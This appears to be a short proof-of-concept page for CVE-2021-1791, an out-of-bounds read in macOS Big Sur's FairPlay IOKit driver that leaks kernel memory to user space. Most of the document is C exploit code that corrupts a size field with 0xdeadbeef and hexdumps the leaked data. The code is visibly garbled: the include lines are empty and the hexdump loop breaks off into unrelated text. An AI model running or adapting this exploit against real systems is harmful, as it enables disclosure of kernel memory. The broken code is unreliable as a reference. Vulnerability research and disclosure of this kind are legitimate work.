# CVE-2021-1791 Fairplay OOB Read POC

An out-of-bounds read that leaks kernel memory contents back to user space.

Affected version: macOS Big Sur 11.0.1

fairplay_iokit_uc_run_versioned.c:

```c
#include
#include
#include
#include
#include
#include

void hexdump(void *ptr, int buflen) {
    unsigned char *buf = (unsigned char*)ptr;
    int i, j;
    for (i=0; ifield_0 = 0x00000008;
    sIn->field_4 = 0x525e5ba4;
    sIn->field_8 = 0x34788a7a;
    sIn->size = 0x70;
    memcpy(sIn->sec1,sec1,20);
    memcpy(sIn->sec2,sec2,sIn->size);
    //magic
    sIn->size = 0xdeadbeef;

    if(fairplay_run_versioned(conn,sIn,sOut)){
        return -1;
    }

    printf("outSec1 : \n");
    hexdump(sOut->sec1,20);

    printf("outSec2 : \n");
    hexdump(sOut->sec2,sOut->size);

    printf("[+] fairplay success, size = %d, ret = %d\n",sOut->size,sOut->fp_ret);
}
```

ref:

* https://support.apple.com/en-us/HT212147
* https://gist.github.com/pwn0rz/e34ab9f6e46956621a9d4f98cf222320
